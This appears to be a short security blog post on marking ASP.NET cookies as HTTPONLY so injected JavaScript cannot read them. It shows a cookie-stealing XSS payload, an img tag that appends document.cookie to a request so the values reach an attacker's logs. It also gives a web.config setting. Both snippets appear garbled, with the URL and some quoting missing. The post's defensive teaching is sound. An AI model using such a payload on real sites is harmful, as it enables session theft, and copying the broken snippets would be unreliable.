Mark Cookies as HTTPONLY

Marking your cookies as HTTPONLY will mean that JavaScript code running in most browsers cannot access a user’s cookies. This is important as if a hacker does manage to compromise your site and inject JavaScript it may be possible for the hacker to steal values of cookies (including security cookies). If HTTPONLY is set on the cookies then if a user logs into the compromised site, any JavaScript maliciously run cannot access the cookies and therefore cannot pass their details to the hacker. This is because the user’s browser will know access is not allowed and prevent it.

If HTTPONLY is not set and if a hacker manages to inject even an image download like below into a site, then when a user logs in and the script runs the hacker will have access to the users cookie values simply by checking the web logs of

<img src=; + document.cookie +‘/>’

If the website has set HTTPONLY to true on its cookies then when a user logs in to the website and the malicious code is run, the user’s browser will understand that access to the cookies is not allowed and will prevent access. Most browsers will implement this security feature. In some websites JavaScript will need access to data stored in cookies but this is not normally the case.

You can set this feature in the web.config as below


<httpCookies httpOnlyCookies=true/>

In the most versions of this is set by default but again occasionally it is deliberately turned off so JavaScript can access data in a cookie. If this is the case I would guess you may want to put the information to be accessed by JavaScript in one cookie and the private information in another.



One thought on “Mark Cookies as HTTPONLY

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s